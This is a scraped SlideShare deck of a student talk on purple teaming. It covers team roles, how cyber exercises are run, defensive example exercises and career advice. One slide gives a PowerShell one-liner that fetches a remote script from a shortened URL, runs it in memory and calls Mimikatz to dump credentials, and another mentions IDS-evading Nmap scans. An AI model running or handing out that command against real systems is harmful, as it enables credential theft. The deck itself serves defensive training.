SlideShare a Scribd company logo
1 of 130
Download to read offline
@haydnjohnson
Purple Team what,
why, how, even
Students - Feel free to reach out to me and ask any questions. We gotta look after our
own Canadians
@haydnjohnson
Whoami
Haydn Johnson
Security Analyst | Manager | Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, HackFest, SecTor.
NolaCon
Offsec, Purple Team, Gym??
http://www.slideshare.net/HaydnJohnson
3
I work here!
@haydnjohnson
1.
Outline
give a summary of (something).
@haydnjohnson
Outline
Terminology
❏ Security in General
❏ Red Team
❏ Blue Team
What is Purple Teaming
❏ Core concept
❏ Process
❏ Togetherness
Examples of Purple Teaming
❏ NMap
❏ Mimikatz
❏ Attachment Testing
❏ Table Top
❏ BloodHound
❏ OpenDLP
@haydnjohnson
Full disclosure
❏ Most slides taken from
my Purple Team OWASP
Austin Talk
❏ Re-adjusted for students
@haydnjohnson
Security in general
@haydnjohnson
What is this security thing?
No clear definition!
Many different parts of security
CIA Triangle
@haydnjohnson
What is this security thing?
CONFIDENTIALITY
INTEGRITY
AVAILABILITY
@haydnjohnson
What is this security thing?
AVAILABILITY
Business only see:
@haydnjohnson
What is this security thing?
Types of Jobs:
❏ Security Manager
❏ Intrusion Analyst
❏ Incident Responder
❏ Policy Analyst
❏ GRC / Audit
❏ Penetration Tester
❏ Red Teamer
❏ Exploit Developer
❏ Threat Intelligence
❏ + MANY MORE
@haydnjohnson
Purple Team
OR
Questions / Career Discussion
@haydnjohnson
1.
Terminology
What means what
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf
@haydnjohnson
Terminology
@haydnjohnson
Terminology
Vulnerability Assessment Person - Run Vuln
Scanner....hey client you suck
Penetration Tester - Metasploit / MSF PRO (FTW)...hey
client you suck
Red Teaming - Phish, move laterally, find “sensitive stuff”,
maybe custom implant...hey client you suck
Purple Teaming - You did all the above, but got to charge
for an extra body and to tell the client how they suck in
person
@haydnjohnson
Terminology
Red Teaming - “Red Team engagements are the full
spectrum warfare of security assessments. In a red team
engagement, the consultants attack the client organization
using physical means, social engineering, and
technological avenues. “
From: http://winterspite.com/security/phrasing/
@haydnjohnson
Terminology
From: http://winterspite.com/security/phrasing/
Red Teaming
@haydnjohnson
From: Chris Nickerson Lares Consulting
@haydnjohnson
Terminology
Blue Team
❏ Network defenders
❏ Support
❏ Firewalls | Blinky Boxes
❏ Responders
@haydnjohnson
Terminology
Purple Team
❏ Working together to achieve the ultimate goal of
making the organization more secure
❏ different threats & attacker mindset
❏ incident detection and response
❏ policy and procedures
❏ tuning of controls
@haydnjohnson
@haydnjohnson
2.
Purple Team
Process
what | how
@haydnjohnson
Purple Team
❏ Conducting focused pentesting (up to Red
Teaming) with clear training objectives for the
Blue Team.
❏ It isn't a "can you get access to X" exercise it is
a "train the Blue Team on X" exercise. The
pentesting activities are a means to conduct
realistic training.
@haydnjohnson
Purple Team
Primary result of the exercise is to create an
intrusion event (aka get caught) to test
instrumentation (host/ network), validate
detection processes and procedures, validate
protections in place, force response procedures
and post mortems.
Differs from Red Team where primary goal is to
NOT get caught
@haydnjohnson
Purple Team
❏ Togetherness
AttackDefend
@haydnjohnson
3.
Cyber Exercises
MITRE cyber exercise playbook
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf
@haydnjohnson
@haydnjohnson
Events / Injects
Events - generally executed by the Red Team to elicit
responses from the Blue Team in specific phases,
focused on the objectives of the exercise.
@haydnjohnson
Different Teams
within cyber exercises
@haydnjohnson
Exercises - Teams
ECG GREY
RED BLUE
@haydnjohnson
Exercises - Teams
Exercise Control Group
Take information from other teams and make
decision to ensure the exercise is “controlled” and
reaches its goals.
IR Manager
Team Lead
VP
ECG
@haydnjohnson
Exercises - Teams
Gray Team / Observers
Observe the Blue Team's reaction or non-reaction and
report back to ECG.
Ongoing process
IR Manager
Team Lead
VP
GREY
@haydnjohnson
Exercises - Teams
@haydnjohnson
Phases
of cyber exercises
@haydnjohnson
Phases of a Cyber Exercise
❏ Plan
❏ Execution
❏ Lessons Learned
@haydnjohnson
Exercises - Planning
Preliminary
Meeting
Middle
Meetings
Final
Meeting
@haydnjohnson
Exercises - Planning
“By failing to prepare, you are preparing to fail.”
Benjamin Franklin
Everything needs consideration, pros, cons and a
plan!
1. Brainstorming
2. Action Items
3. Budget / Approval
@haydnjohnson
Exercises - Planning
Each team needs to know the end goals (except Blue)
Red Team needs to know what injects and when.
Goals:
1. To prevent confusion
2. Finalize Objectives
3. Identify if training is required
4. Decide on Use Cases
@haydnjohnson
Exercises - Ideas
Initial Weakness
New technology
New Team
Test assumption
Budget
Devils advocate
@haydnjohnson
Exercises - Ideas
https://github.com/aptnotes/data/blob/master/APTnotes.csv
@haydnjohnson
Exercises - Execution
❏ Execution
❏ Go Time
❏ Observe, Change, Observe
Be Dynamic
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
RT tasked with
action
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
RT tasked with
action
Execute inject /
event
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
Collects
information
RT tasked with
action
Execute inject /
event
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
4
Collects
information
Feedback to ECG
RT tasked with
action
Execute inject /
event
@haydnjohnson
Exercises - Execution
What if no response?
No Alerts?
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check for
hackers.fu
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check alert for
mal.exe
@haydnjohnson
Exercises - Lessons Learned
❏ What observations were made during the
exercise.
What went well, what didn’t
Positive and negative - constructive
@haydnjohnson
Exercises - Lessons Learned
❏ Internally we need to prepare better
❏ Ensure findings are document
❏ Think of more alternative tests
@haydnjohnson
Exercises - Lessons Learned
Exercise
Good
Bad
Improvements Follow-up
@haydnjohnson
Exercises - Lessons Learned
Collect Information from everyone
Strengthen future exercises
Exercise
Control
Group
Red
Team
Training
Audience
Observers
@haydnjohnson
4.
Example exercises
Using CKC & EKC
@haydnjohnson
Nmap
Mimikatz
Malicious Attachment Testing
BloodHound
Tabletop Exercise
OpenDLP
@haydnjohnson
Port Scanning Detection
Nmap
@haydnjohnson
Example 1 - Nmap
# of People Required: 1
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None
@haydnjohnson
Example 1 - Nmap
Test if Nmap / Port scans can be seen internally or
externally
What do the alerts look like?
@haydnjohnson
Example 1 - Nmap
Start Basic
Increase complexity
Fragmentation
@haydnjohnson
Example 1 - Nmap
$END POINT SOLUTION catches Nmap
$EPS misses fragmentation / slow scans
Each workstation gives ALERT
Try with Avast, McAfee, Symantec etc
@haydnjohnson
Example 1 - Nmap
https://nmap.org/book/man-bypass-firewalls-ids.html
@haydnjohnson
Example 1 - Nmap
Why Nmap? APT won’t use Nmap
❏ It is a start
❏ Simple & cheap
❏ Test current technology
@haydnjohnson
Example 1 - PowerShell
Advancing the exercise
@haydnjohnson
PowerShell Remoting
Mimikatz
@haydnjohnson
Example 2- Credentials in Memory
# of People Required: 1 -2
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None
@haydnjohnson
Example 2- Credentials in Memory
Helpdesk / Ops wants a secure way to remotely
manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and
‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/
@haydnjohnson
Example 2- Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditbility
Research shows this is possible
@haydnjohnson
Example 2- Credentials in Memory
Steps:
○ Before PS-Remoting ○ After PS-Remoting
@haydnjohnson
Example 2- Credentials in Memory
❏ Need to know for sure
❏ Want to test credentials are safe
❏ See for self
Mimikatz comes in
@haydnjohnson
Example 2- Credentials in Memory
Command Run:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds | Out-File pre.txt”
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa
sswords-with.html
@haydnjohnson
Example 2- Credentials in Memory
Dumping credentials
@haydnjohnson
Example 2- Credentials in Memory
PS-Remote
@haydnjohnson
Example 2- Credentials in Memory
Compare
@haydnjohnson
Example 2 - Credentials in
Memory
Thumbs up success gift] / image
@haydnjohnson
Example 2- Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!
@haydnjohnson
email filter
Malicious
Attachment
Testing
@haydnjohnson
Example 3 - Malicious Attachment
Testing
<Email> is great at filtering malicious emails,
attachments etc.
We want to see what gets through to know what to
expect
“What could get through”
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Malicious File Maker
@carnal0wnage
https://github.com/carnal0wnage/malicious_file_make
r
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Automates sending
@haydnjohnson
Example 3 - Malicious Attachment
Testing
AV Pop-Ups
@haydnjohnson
Example 3 - Malicious Attachment
Testing
@haydnjohnson
Example 3 - Malicious Attachment
Testing
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Not script kiddie friendly
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Some attachments you cannot send
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Receiving file attachments
@haydnjohnson
Example 3 - Malicious Attachment
Testing
The goal:
❏ Confirm email attachment filtering
❏ Confirm attachments that bypass
❏ Document findings for reference
❏ Potential defenses / future steps
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Which allows us:
❏ Potential tuning to block file types
❏ Research file types for use in the wild
❏ Identification of compensating controls
@haydnjohnson
BloodHound
Domain Admin
Paths
@haydnjohnson
Example 4 - Domain Admin Paths
# of People Required: 1 -2
Level of knowledge required: Enough to install the tool
Documentation online: Installation instructions
Time to Test Minimal
Disruption to Business Potential to pop alerts
@haydnjohnson
Example 4 - Domain Admin Paths
Goals:
❏ Identify Domain Admins
❏ Identify derivative admins
❏ Weakness in the chain of trust
@haydnjohnson
Example 4 - Domain Admin Paths
BloodHound command:
https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/
https://wald0.com/?p=112
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started
@haydnjohnson
Example 4 - Domain Admin Paths
Tested with helpdesk access
@haydnjohnson
Example 4 - Domain Admin Paths
Mystery account “SUPERHERO” identified via ACLs
@haydnjohnson
Example 4 - Domain Admin Paths
❏ Follow up on mystery account
❏ Create Ticket
❏ Does it require the access it has?
Test with a group that has less access
@haydnjohnson
Table Top Exercise
@haydnjohnson
Example 4 - Table Top Exercise
# of People Required: Many
Level of knowledge required: Varied
Documentation online: Yes
Time to Test Long term
Disruption to Business 1 day +
@haydnjohnson
Example 4 - Table Top Exercise
Goals:
❏ Raise awareness
❏ Practice before it happens
@haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
During
Post
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302
@haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
$Group Threaten Company
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302
@haydnjohnson
@haydnjohnson
Example 4 - Table Top Exercise
Response A
@haydnjohnson
Example 4 - Table Top Exercise
Response B
@haydnjohnson
Example 4 - Table Top Exercise
ECURITY
C - LEVEL
PR
IT
@haydnjohnson
Example 4 - Table Top Exercise
Technical Response
IR
Hardening
Public Response
Disclosure
Insurance
@haydnjohnson
Example 4 - Table Top Exercise
Do this for each stage:
❏ Pre Hack
❏ During
❏ Post Hack
@haydnjohnson
OpenDLP
Lateral Movement
@haydnjohnson
Example 5 - Lateral Movement
# of People Required: 1-2
Level of knowledge required: Ability to find network shares
Documentation online: Yes
Time to Test hours
Disruption to Business Minimal
@haydnjohnson
Example 5 - Lateral Movement
Goals:
❏ Is there sensitive information at rest?
❏ What data could be accessed on network shares
@haydnjohnson
Please note
❏ Exercises do not have to be ‘offsec’ tool focused
❏ Attacker mindset is important
❏ Testing assumptions
@haydnjohnson
Example 5 - Lateral Movement
OpenDLP
❏ Data Loss prevention tool
❏ Identifies sensitive data at rest on thousands of
systema
❏ Not easy to install
https://github.com/ezarko/opendlp
@haydnjohnson
Example 5 - Lateral Movement
OpenDLP Video Reference
Bsides Cleveland 2017
Blue-Teamin' on a Budget [of Zero]
https://www.youtube.com/watch?v=77M0aO2F2fU
@haydnjohnson
Example 5 - Lateral Movement
❏ Download OVA
❏ Transfer sc.exe from XP 32bit
❏ Install browser sert
❏ Start apache
❏ connect
@haydnjohnson
Example 5 - Lateral Movement
Issues with install:
❏ sc.exe 32bit
❏ Accessing web server
❏ Solution:
XP
http://www.makeuseof.com/tag/download-wi
ndows-xp-for-free-and-legally-straight-from-
microsoft-si/
@haydnjohnson
Example 5 - Lateral Movement
Import cert
@haydnjohnson
Example 5 - Lateral Movement
Looks like this
@haydnjohnson
Example 5 - Lateral Movement
❏ PII
❏ Credit card data etc
@haydnjohnson
Example 5 - Lateral Movement
Report looks like:
@haydnjohnson
Example 5 - Lateral Movement
❏ This is still a work in progress.
❏ Wondering how I can create a process out of it
@haydnjohnson
Conclusion
@haydnjohnson
5.
Career / Infosec
Stuff
Ask questions.
Open Forum
@haydnjohnson
My Career in Depth
@haydnjohnson
From Australia
Masters of I.T - infosec specialization
Internship @ Deloitte Australia
Graduate program @ Deloitte
Move to Deloitte Canada
Move to KPMG Canada
Move to Points
@haydnjohnson
Social Media
Infosec Twitter
@haydnjohnson
Infosec Twitter
General information
Feeling part of a community
Mentors / Mentees
Motivation
@haydnjohnson
Speaking publicly
@haydnjohnson
Speaking / Publicity
Local Bsides Toronto
CO submission to Circle City Con
CO Submission to HackFest
BsidesLV Mentee program (Proving grounds)
CO Submission to SecTor (Chris Gates mentoring)
@haydnjohnson
Speaking / Publicity
Benefits
❏ Knowing your topic enough to speak
❏ Communication Skills
❏ Networking
❏ Speaking itself
@haydnjohnson
Github
@haydnjohnson
Github
❏ I sort of have one
❏ Lots of dead end projects
❏ Contributed to Gdog
@haydnjohnson
GitHub
Benefits
❏ Shows more than a CV
❏ Contribute to known projects
❏ Little projects that are recorded
@haydnjohnson
Questions
Career stuff
others

More Related Content

Similar to UOIT Purple Team - Student Edition 2017

Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainHaydn Johnson
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Haydn Johnson
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-finalHaydn Johnson
 
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...NoNameCon
 
How to make your retrospectives the heart of your agile proces
How to make your retrospectives the heart of your agile procesHow to make your retrospectives the heart of your agile proces
How to make your retrospectives the heart of your agile procesYves Hanoulle
 
Becoming a software testing expert
Becoming a software testing expertBecoming a software testing expert
Becoming a software testing expertmoosix
 
Engineering Management for Early Stage Startups
Engineering Management for Early Stage StartupsEngineering Management for Early Stage Startups
Engineering Management for Early Stage StartupsAndreas Klinger
 
Cliffnotes on Blue Teaming
Cliffnotes on Blue TeamingCliffnotes on Blue Teaming
Cliffnotes on Blue TeamingRishabh Dangwal
 
Permission to Fail
Permission to FailPermission to Fail
Permission to FailVMware Tanzu
 
Bringing Science to Software Development
Bringing Science to Software DevelopmentBringing Science to Software Development
Bringing Science to Software DevelopmentArty Starr
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsCybereason
 
Building an A/B Testing Analytics System with R and Shiny
Building an A/B Testing Analytics System with R and ShinyBuilding an A/B Testing Analytics System with R and Shiny
Building an A/B Testing Analytics System with R and ShinyEmily Robinson
 
PMNetwork_March_20015_AndreaPaparello
PMNetwork_March_20015_AndreaPaparelloPMNetwork_March_20015_AndreaPaparello
PMNetwork_March_20015_AndreaPaparelloAndrea Paparello, PMP
 
10 Tips From A Young Data Scientist
10 Tips From A Young Data Scientist10 Tips From A Young Data Scientist
10 Tips From A Young Data ScientistNuno Carneiro
 
20 things I wish I had known about modern product development by Andy Birds -...
20 things I wish I had known about modern product development by Andy Birds -...20 things I wish I had known about modern product development by Andy Birds -...
20 things I wish I had known about modern product development by Andy Birds -...Andy Birds
 
Nerd herding ntc11nerd - Howe
Nerd herding ntc11nerd - HoweNerd herding ntc11nerd - Howe
Nerd herding ntc11nerd - HoweGrant M Howe
 
Disaster And Business Continuity by Tom Canavan
Disaster And Business Continuity by Tom CanavanDisaster And Business Continuity by Tom Canavan
Disaster And Business Continuity by Tom CanavanJohn Coonen
 
3 Simple Habits of a Highly Effective Team
3 Simple Habits of a Highly Effective Team 3 Simple Habits of a Highly Effective Team
3 Simple Habits of a Highly Effective Team Andy Harjanto
 

Similar to UOIT Purple Team - Student Edition 2017 (20)

Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
 
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...
 
Getting better
Getting betterGetting better
Getting better
 
How to make your retrospectives the heart of your agile proces
How to make your retrospectives the heart of your agile procesHow to make your retrospectives the heart of your agile proces
How to make your retrospectives the heart of your agile proces
 
Becoming a software testing expert
Becoming a software testing expertBecoming a software testing expert
Becoming a software testing expert
 
Engineering Management for Early Stage Startups
Engineering Management for Early Stage StartupsEngineering Management for Early Stage Startups
Engineering Management for Early Stage Startups
 
Cliffnotes on Blue Teaming
Cliffnotes on Blue TeamingCliffnotes on Blue Teaming
Cliffnotes on Blue Teaming
 
Permission to Fail
Permission to FailPermission to Fail
Permission to Fail
 
Bringing Science to Software Development
Bringing Science to Software DevelopmentBringing Science to Software Development
Bringing Science to Software Development
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the Basics
 
Building an A/B Testing Analytics System with R and Shiny
Building an A/B Testing Analytics System with R and ShinyBuilding an A/B Testing Analytics System with R and Shiny
Building an A/B Testing Analytics System with R and Shiny
 
PMNetwork_March_20015_AndreaPaparello
PMNetwork_March_20015_AndreaPaparelloPMNetwork_March_20015_AndreaPaparello
PMNetwork_March_20015_AndreaPaparello
 
10 Tips From A Young Data Scientist
10 Tips From A Young Data Scientist10 Tips From A Young Data Scientist
10 Tips From A Young Data Scientist
 
20 things I wish I had known about modern product development by Andy Birds -...
20 things I wish I had known about modern product development by Andy Birds -...20 things I wish I had known about modern product development by Andy Birds -...
20 things I wish I had known about modern product development by Andy Birds -...
 
Problem solving course
Problem solving courseProblem solving course
Problem solving course
 
Nerd herding ntc11nerd - Howe
Nerd herding ntc11nerd - HoweNerd herding ntc11nerd - Howe
Nerd herding ntc11nerd - Howe
 
Disaster And Business Continuity by Tom Canavan
Disaster And Business Continuity by Tom CanavanDisaster And Business Continuity by Tom Canavan
Disaster And Business Continuity by Tom Canavan
 
3 Simple Habits of a Highly Effective Team
3 Simple Habits of a Highly Effective Team 3 Simple Habits of a Highly Effective Team
3 Simple Habits of a Highly Effective Team
 

More from Haydn Johnson

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkHaydn Johnson
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about itHaydn Johnson
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonHaydn Johnson
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016Haydn Johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awarenessHaydn Johnson
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthroughHaydn Johnson
 

More from Haydn Johnson (8)

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnson
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016
 
Empire Work shop
Empire Work shopEmpire Work shop
Empire Work shop
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
 
Purple View
Purple ViewPurple View
Purple View
 

Recently uploaded

Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 

Recently uploaded (20)

Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 

UOIT Purple Team - Student Edition 2017